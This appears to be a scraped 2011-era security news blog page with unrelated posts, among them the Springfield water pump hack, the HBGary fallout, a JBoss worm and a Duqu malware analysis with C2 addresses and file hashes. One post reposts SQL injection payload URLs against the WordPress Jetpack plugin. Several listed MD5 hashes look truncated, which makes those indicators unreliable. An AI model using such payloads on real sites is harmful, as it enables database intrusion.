Google To Shut Down More Seven Products

Google To Shut Down More Seven Products

The out-of-season "spring clean" brings an end to services including Google Wave, Knol and Google Gears.It is the third time Google has announced a cull of several of its products at the same time after they had failed to take off.Experts said the strategy might put off users from signing up to new services.

"We're in the process of shutting a number of products which haven't had the impact we'd hoped for, integrating others as features into our broader product efforts, and ending several which have shown us a different path forward," said Urs Holzle, Google's vice president of operations at the official google blog.

The list includes - 

• Google Wave - An attempt to combine email and instant messaging for real-time collaboration.
• Google Bookmarks Lists - A service which allowed users to share bookmarks with friends.
• Google Friend Connect - A service that allowed webmasters to add social features to their sites by embedding a snippet of code.
• Google Gears -  A much-hyped effort to maintain web browser functionality when working offline.
• Knol - A Wikipedia-style project, which aimed to improve web content.
• Renewable Energy Cheaper than Coal - A project which aimed to find ways to improve solar power.
• Google Search Timeline - A graph of historical query results.

To know more details like when the switch-off will take place visit the GOOGLEBLOG

Do you download Free Softwares from UN-OFFICIAL websites

Do you download Free Softwares from UN-OFFICIAL websites?


I know you are pro in searching and downloading pirated software’s and am sure you are aware of the risk behind it. But what about Open source and Free software’s? Do you download them from any 3rd party websites or file sharing networks? ..well its time to be aware of the Risk.

Popular open-source software’s that are being downloaded by thousands of internet users everyday includes VLC media player, Google Chrome browser and others. Most people prefer downloading these from unofficial websites, because they feel its more complicated when downloading from Official Websites, Like in the case of downloading ‘Google chrome browser’ from official webpage, you are first required to download small downloader which will then download and install the chrome browser on your PC. But many other websites provide download link for the full “Google chrome” exe file and people prefer this way.

We all know that the main objective of open-source software developers, is to share the source code with everyone. Because they expect other developers to fix any bugs or add new features to it and make it more beautiful. But some time it gets abused.

Scammers are taking advantage of the availability of the source code to trick users and make money. The Scammers are adding malware and adware to these software’s and releasing them as the original product. Some deceptive sites are even re-branding the original open-source project and selling them as a new product.

Trusted Websites: brother-soft | cnet | sourceforge | filehippo

The Scammers are Binding “open-source sofwares” with various crapware to monetize the software with loads of advertisements and earn money. The result of this is a poor product that doesn’t work as intended, that can’t be uninstalled and that clearly abuses its users and their privacy. Recently there were reports that some websites are selling “Mozilla Firefox browser”, using the Mozilla trademarks to promote other products and services, or using modified versions of the Mozilla trademarks.
How these Scammers work?

#1 They Download the source code from open source projects and add adware or malware to it.
#2 They release their version of product and disguise as the original.
#3 They advertise their product on adverting networks like Google AdWords.
#4 They earn more money through the malware and adware bundled with their version of Free Software.
#5 They buy more advertisements to spread their copy of free software and earn even more.

These activities are indeed deceptive, harm users and cause consumer confusion. Open source Softwares are affected and will keep on affected by this scourge and there’s not much we can do about it. So the next time you download any free open-source software, make sure you are on the right place


source

OS.js - The JavaScript Operating System

OS.js (JavaScript Operating System)  

OS.js

OS.js started out as a tool to use that can be used to  run GUI applications to configure services without installing X and a window manager (including VNC or similar remote management) and connect from anywhere in the world just using a web-browser. This one Includes a window manager and a simple desktop environment (similar to most Linux environments out there). Standards are inspired by GTK and freedesktop. Applications are developed using Glade Interface Designer (GTK+3 XML) and (optionally) an SQL database XML-scheme,A built-in compiler creates JavaScript, CSS, SQL and PHP templates from the projects including support for events (signals). One can also create static applications from raw HTML, JS and CSS.A Virtual Filesystem(VFS) is included. It works with local files, block devices, network connections, compressed files etc.Applications uses a public API that consists of simple OS operations and calls to the application server-side script and the core libraries (File-system with restrictions), Networking, Services, Configuration files etc.).

OS.js’ code-base is light-weight and small in size.

• JavaScript < 300kb (minimized, including applications etc.)

• CSS < 200 kb (minimized, including applications etc.)

• XML: < 300 kb (including applications etc.)

• PHP < 200 kb

Features:

• Follows strict coding standards, fully documented
• Uses HTML5 and CSS2+ features (Supported features are detected on first run.)
• Uses a light-weight PHP backend
• Simple process managment (process stack, kill processes etc)
• Desktop environment (Customizable settings, themes, fonts, cursors etc)
• Window Managment (With standard window actions like maximize, minimize, restore, on-top and so on)
• Session Managment (Save and restore sessions for later use)
• Desktop Panels (movable)
• Desktop Panel items (See list below)
• Sandboxed Applications with API access and crash-handling
• Uses WebStorage to store system/user/application settings and sessions (SQL as backup in case of deletion of browser cache)
• TCP/IP Socket connections via WebSocket wrapper (hybi-00 and hybi-10)
• Application Compiler (Compiles Application+Glade-XML into JavaScript, CSS and PHP code, also minifies the code)
• VFS – Virtual Filesystem support (Block devices, Network connections, Compressed files etc.)
• Application WebWorkers for faster processing of complex data

Compability:

• Working: Linux with WebKit/Safari/Chrome, Gecko/Mozilla/Firefox (Safari has some minor CSS issues)
• Wokring: Google Android 2.2 (Samsung Galaxy S tested 2.2/2.3)
• Wokring: Apple iOS 4 (iPad iOS4 tested)
• Probably working: Windows with WebKit/Safari/Chrome, Gecko/Mozilla/Firefox (Safari has some minor CSS issues)
• Partially working: Opera 10+ – Problem with Glade/GTK CSS
• Partially working: Internet Explorer 8 – Problem with Glade/GTK CSS, Missing WebSocket and Canvas
• Not tested: Internet Explorer 9

For More Information Visit The PROJECT PAGE

Hackers Attack City Water Station and Destroys a Pump

Hackers Attack City Water Station and Destroys a Pump

Hackers gained remote access into the control system of the city water utility in Springfield, Illinois, and destroyed a pump last week, according to a report released by a state fusion center and obtained by a security expert.The hackers were discovered on Nov. 8 when a water district employee noticed problems in the city’s Supervisory Control and Data Acquisition System (SCADA). The system kept turning on and off, resulting in the burnout of a water pump.

The intruders launched their attack from IP addresses based in Russia and gained access by first hacking into the network of a software vendor that makes the SCADA system used by the utility. The hackers stole usernames and passwords that the vendor maintained for its customers, and then used those credentials to gain remote access to the utility’s network.

“It is unknown, at this time, the number of SCADA usernames and passwords acquired from the software company’s database and if any additional SCADA systems have been attacked as a result of this theft,” the report states, according to Joe Weiss.

Wordpress Jetpack Plugin Vulnerable to SQL Injection

Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: Wordpress
# Download:http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP

Jetpack is a WordPress plugin that supercharges your self-hosted WordPress site with the awesome cloud power of WordPress.com.A SQL vulnerability have been found by longrifle0x in this plugin.


File: wp-content/plugins/jetpack/modules/sharedaddy.php

Exploit: id=-1; or 1=if
Exploitation:
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None'LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][MID((VERSION()),1,6)
Via - 1337day

After dealing with Anonymous HBGary Federals CEO resigns

After dealing with Anonymous HBGary Federals CEO resigns 

The game is over for Aaron Barr. HBGary Federal’s CEO, who was targeted by Anonymous, announced his resignation on Monday during an interview with Kaspersky's news portal, Threatpost. Barr said he would step down to focus on his family and rebuild his reputation.
Aaron Barr has rarely given interviews to the media since the events that led to Anonymous using him, his company HBGary Federal, and its parent firm HBGary, as an object lesson over a story he gave to the Financial Times. So his interview with Threatpost was both expected, given his announcement, and random, considering his silence.
“I need to focus on taking care of my family and rebuilding my reputation," Barr said during his conversation with Threatpost.
"It’s been a challenge to do that and run a company. And, given that I’ve been the focus of much of bad press, I hope that, by leaving, HBGary and HBGary Federal can get away from some of that. I’m confident they’ll be able to weather this storm.”
The storm started when Barr told the Financial Times on February 5, that he had used clues found online to discover the identities of key Anonymous associates.
He said was able to make these connections by using services such as LinkedIn, Classmates.com, and Facebook, as well as IRC itself. The data he collected was to be used for a presentation during B-Sides San Francisco.
The reaction from Anonymous to the story Barr told was swift and brutal. They compromised HBGary and HBGary Federal, leveraging Web vulnerabilities, as well as privilege elevation exploits, to hijack everything from Twitter and LinkedIn accounts to the company email. The hijacked email is what caused Barr the majority of his problems.
While reading the company communications, Anonymous discovered that Barr was shopping his research to various federal agencies, as well as bragging to co-workers that he had infiltrated the loosely associative group.
Given Barr’s claims, Anonymous released the hijacked emails, holding only Greg Hoglund’s emails in reserve. Some time later, Anonymous released those emails as well. To coincide with the final HBGary leak, they developed a website that contains more than 70,000 HBGary emails in a searchable listing, dubbed AnonLeaks.
The leaked communications provided an interesting look into a security company that deals with both the private and the government sectors at the same time. It was from these emails, as well as a tip from Crowdleaks.org, that The Tech Herald was able to break the story of Barr’s role in a plot with two other data intelligence firms to target WikiLeaks and journalist Glenn Greenwald.
Days after that story broke, ThinkProgress reported on another discovery from the leaked HBGary and HBGary Federal email cache.
According to them, Barr and the same data intelligence firms also developed plans for the U.S. Chamber of Commerce, which would allow them to “undermine their political opponents, including ThinkProgress, with a surreptitious sabotage campaign.” To make matters worse, the plans included families and children.

JBoss attack proves Microsofts Zero-Day findings

JBoss attack proves Microsoft’s Zero-Day findings. Credit: Red Hat.

JBoss attack proves Microsoft’s Zero-Day findings

A Worm targeting unpatched or improperly configured JBoss installations adds some proof to Microsoft’s research findings released earlier this month, which point to the fact that unknown vulnerabilities aren’t as big of a threat as they are made out to be.

According to Red Hat, a Worm targeting problems addressed over a year ago is spreading online, which allows an attacker to run arbitrary code on compromised systems. The Worm was broken down by a freelance security researcher, who happened to come across it when his Honeypot server was attacked.

“I explored the contents of the malicious payload left, and it contained Perl Scripts to automatically connect the compromised host to an IRC Server and be part of a BOTNET,” wrote the researcher, who uses the name @guerilla7 on Twitter.

"[The Perl Scripts] install and run a remote access tool using DynDNS (Flu.pl), and two Windows batch scripts, one is for exploring JBOSS Services (wstools.bat) and a script to discover all UDP-based members running on a certain mcast addressJGroups called "JGroups Cluster Discovery Script for Win32" (probe.bat)."

The authentication bypass vulnerabilities in JBoss were patched in April 2010, and they were covered along with other issues by Christian Papathanasiou, during Trustwave’s BlackHat EU talk the same year. It’s worth reading up on the security concerns, if your organization is one of the tens of thousands of enterprises using it in JSP deployments. [BlackHat EU 2010 Slides]

Likewise, guidance on dealing with password configuration protection related issues can be seen here.

“This problem is exacerbated by many organizations deploying systems that they don’t keep up to date. Many businesses outsource Web application development and once the application is deployed, service contracts may lapse or IT staff may not be paying much attention to them. Many organizations treat these deployments as black boxes, and don’t touch them out of fear that they'll break something,” commented Marcus Carey, security researcher at Rapid7.


“There are three exploit modules in Metasploit, an open source security tool, that exploit this vulnerability. There is also a scanner available in Metasploit to allow organizations to scan for it...yet many organizations are not doing so and are seriously dropping the ball. The use of this new malware associated with JBoss is something we have not seen before; however, the actual vulnerability it is exploiting should have been snuffed out years ago. This is far more a business failure than a software security failure at this point.”

As mentioned, the JBoss attack is a textbook example of what Microsoft reported earlier this month. In their annual Security Intelligence Report, Microsoft said that security flaws where patches are available greatly outnumber zero-day attacks.

According to the research, exploits with a patch available for over a year accounted for 3.2% of compromises, compared to 2.4% for patches available for less than a year. Much-talked-about zero-day attacks were responsible for just 0.12% activity.

“The numbers don't lie; organizations are much more likely to be hit with something they didn't patch instead of a zero-day. This latest news story, as well as the Microsoft report both scream the need to get back to the basics in security. This means better training users and system administrators to prioritize known threats,” added Carey.

Additional Red Hat information on JBoss is can be viewed here and here.

Android's Facial Recognition Unlock feature Bypassed by Digital Image

                                     

A video demonstration created by mobile blog SoyaCincau shows that the Face Unlock feature can be fooled by showing it a mere image of the face used to set up the locking mechanism. The video shows someone unlocking a Galaxy Nexus running Android 4.0, also known as Ice Cream Sandwich, by holding in front of the device a digital photo taken of him that is displayed on another phone.

Per the description of the YouTube video:

While some of you think that it is a trick and I had set the Galaxy Nexus up to recognise the picture, I assure you that the device was set up to recognise my face.... I would love to do this test again but I don't have a Galaxy Nexus, it is VERY hard to come by as it is not launched yet, but I urge anyone with a Galaxy Nexus to do the same test. Program the device to recognise YOUR FACE and then try to trick the same device with a similar looking picture, it will work

A Google representative contacted by CNET said the feature is considered low security and experimental. Even the interface warns users that "Face Unlock is less secure than a pattern, PIN, or password" and that "Someone who looks similar to you could unlock your phone."


"It was safe to assume that Google wouldn't let its face-recognition technology be bypassed using a photo but this confirms it," The Next Web wrote at the time. "Good news for those who were worried about their friends hacking their smartphone by using a Facebook profile photo or something similar." 

Iran Detects and Fights Back Duqu Virus in System

Iran said on Sunday it had detected the Duqu computer virus that experts say is based on Stuxnet, the so-called "cyber-weapon" discovered last year and believed to be aimed at sabotaging the Islamic Republic's nuclear sites.

The head of Iran's civil defense organization told the official IRNA news agency that computers at all main sites at risk were being checked and that Iran had developed anti-virus software to fight back the virus"We are in the initial phase of fighting the Duqu virus," Gholamreza Jalali, was quoted as saying. "The final report which says which organizations the virus has spread to and what its impacts are has not been completed yet."

While Stuxnet was aimed at crippling industrial control systems and may have destroyed some of the centrifuges Iran uses to enrich uranium, experts say Duqu appeared designed to gather data to make it easier to launch future cyber attacks."Duqu is essentially the precurson to a future Stuxnet-like attack," Symantec said in a report last month, adding that instead of being designed to sabotage an industrial control system, the new virus could gain remote access capabilities.

Iran also said in April that it had been targeted by a second computer virus, which it called "Stars". It was not clear if Stars and Duqu were related but Jalali had described Duqu as the third virus to hit Iran.

Iran has developed a software program that can “control” the newly discovered Duqu spyware, the director of Iran's Passive Defense Organization has announced.“The software, capable of controlling this virus (Duqu), has been provided to organizations and institutions,” IRNA quoted Brigadier General Gholamreza Jalali (Right Picture ) as saying on Sunday. In July, media reports claimed that Stuxnet had targeted industrial computers around the globe, with Iran being the main target of the attack. The reports said Iran's newly launched Bushehr nuclear power plant was at the center of the cyber attack. However, Iranian experts detected the worm in time, averting any damage to the country's industrial sites and resources. 

“The (Iranian) cyber defense base is working round the clock to adopt the necessary measures to counter cyber attacks and the infiltration of spyware,” Jalili stated. 

Exploring the Duqu Bot

The Duqu trojan is composed of several malicious files that work together for a malicious purpose. The first component is a Windows kernel driver that searches for and loads encrypted dynamic link library (DLL) files. The decrypted DLL files implement the main payload of Duqu, which is a remote access trojan (RAT). The RAT allows an adversary to gather information from a compromised computer and to download and run additional programs.

Duqu vs Stuxnet

Attribute	Duqu	Stuxnet
Infection Methods	Unknown	USB (Universal Serial Bus) PDF (Portable Document Format)
Dropper Characteristics	Installs signed kernel drivers to decrypt and load DLL files	Installs signed kernel drivers to decrypt and load DLL files
Zero-days Used	None yet identified	Four
Command and Control	HTTP, HTTPS, Custom	HTTP
Self Propagation	None yet identified	P2P (Peer to Peer) using RPCs (Remote Procedure Call) Network Shares WinCC Databases (Siemens)
Data Exfiltration	Add-on, keystrokelogger for user and systeminfo stealing	Built-in, used for versioning and updates of the malware
Date triggers to infect or exit	Uninstalls self after 36 days	Hard coded, must be in the following range: 19790509 => 20120624
Interaction with Control Systems	None	Highly sophisticated interaction with Siemens SCADA control systems

Like Stuxnet, Duqu attacks Windows systems using a zero-day vulnerability. The installer file is aMicrosoft Word (.doc) that exploits the Win32k TrueType font parsing engine and allows execution. Duqu Malware targets one of the problems in T2EMBED.DLL, which is a TrueType font parsing engine.

How Does Duqu Spreads ? 

Duqu doesn't spread on its own. In one known case, Duqu was installed by a document attachment which was delivered via an e-mail message.

What are indicators of a Duqu infection?

Duqu contains a backdoor that steals information. Infostealers need to send the stolen info back somehow. Careful infostealers try to make the transfer look innocent in case somebody is watching network traffic. Duqu hides its traffic by making it look like normal web traffic. Administrators should monitor their network for systems attempting to resolve this domain or connect to the C2 IP address for possible infection.
Duqu connects to a server (206.183.111.97 a.k.a. canoyragomez.rapidns.com – which used to be in India) and sends an http request. The server will respond with a blank JPG image. After which Duqu sends back a 56kB JPG file called dsc00001.jpg and appends the stolen information (encrypted with AES) to the end of the image file.Read more about the jpeg here

Name	File Size	MD5
jminet7.sys	24,960 bytes	0eecd17c6c215b358b7b872b74bfd80
netp191.pnf	232,448 bytes	b4ac366e24204d821376653279cbad8
netp192.pnf	6,750 bytes	94c4ef91dfcd0c53a96fdc387f9f9c3
cmi4432.sys	29,568 bytes	4541e850a228eb69fd0f0e924624b24
cmi4432.pnf	192,512 bytes	0a566b1616c8afeef214372b1a0580c
cmi4464.pnf	6,750 bytes	e8d6b4dadb96ddb58775e6c85b10b6c
<unknown>   (sometimes referred to as keylogger.exe)	85,504 bytes	9749d38ae9b9ddd81b50aad679ee87e
nfred965.sy	24,960 bytes	c9a31ea148232b201fe7cb7db5c75f5
nred961.sys	unknown	f60968908f03372d586e71d87fe795c
adpu321.sy	24,960 bytes	3d83b077d32c422d6c7016b5083b9fc
iaStor451.sys	24,960 bytes	bdb562994724a35a1ec5b9e85b8e054f

(The byproducts in the Table  have been collected from multiple Duqu variants and would not be present on a single infected computer.)

Why DUQU ? 

The name “Duqu” was assigned to this malware because the keylogger program creates temporary files that begin with the prefix “~DQ”. A computer infected with Duqu may have files beginning with “~DQ” in Windows temporary directories.

References - 

www.pcworld.com/businesscenter/article/243405/microsoft_leaves_duqu_worm_exploit_unpatched.html

http://www.f-secure.com/weblog/archives/00002264.html

http://technet.microsoft.com/en-us/security/advisory/2639658

http://www.securelist.com/en/blog/208193197/The_Mystery_of_Duqu_Part_Two

http://www.symantec.com/connect/w32-duqu_status-updates_installer-zero-day-exploit

http://en.wikipedia.org/wiki/Duqu

Duqu Malware Detection Tool

The Free Duqu Detector Toolkit comes from the CrySyS Lab at the Budapest University of Technology and Economics, which was the first group to discover Duqu, as well as to discover a dropper file (installer) for Duqu that offered additional clues into how the malware would have infected computers and spread. Notably, the installer recovered by CrySyS was a malicious Word document (.doc) file, although security researchers said the malware may have been spread through other means as well.

CrySyS said its toolkit, which includes four command-line-executable components, intentionally includes "very simple, easy-to-analyze program source code . To check that there is no backdoor or malicious code inside." That way, potential users can easily validate the source code before using it in highly specialized environments.

To date, Microsoft has detailed a workaround for the zero-day vulnerability that researchers unearthed in the Duqu source code, which involves a font parsing flaw in the TrueType engine in 32-bit versions of Windows. That vulnerability would have helped the malware to spread and infect its target without being detected. But Microsoft has yet to issue a patch that fixes the flaw exploited by Duqu.

Download Duqu Detector Toolkit 

Project Page

TeaMp0isoN Hacks International Foreign Government E-Mails

Hex000101 a member of TeaMp0isoN team have hacked and leaked the login credentials of various Government sites after hacking their databases such as armynet.mod.uk and  aph.gov.au .They have released these logins in a pastebin post .This Pastebin post doesn't contain any details or explanations on why the operation took place, but most likely the credentials were leaked as a form of retaliation 

against state institutions. .

Android Reverse Engineering ( A.R.E ) Virtual Machine

The Android Reverse Engineering (A.R.E.) Virtual Machine, put together by Anthony Desnos from our French chapter, is here to help. A.R.E. combines the latest Android malware analysis tools in a readily accessible toolbox.


Tools - 

• Androguard
• Android sdk/ndk
• APKInspector
• Apktool
• Axmlprinter
• Ded
• Dex2jar
• DroidBox
• Jad
• Smali/Baksmali

Download - http://redmine.honeynet.org/Android.tar.gz

                                     http://www.honeynet.org/downloads/Android.tar.gz

                                     http://itsec.rwth-aachen.de/files/honeynetproject_are.tar.gz
                                     http://www.honeynor.no/data/honeynetproject_are.tar.gz

The login is : android
And the password is : android

Project Page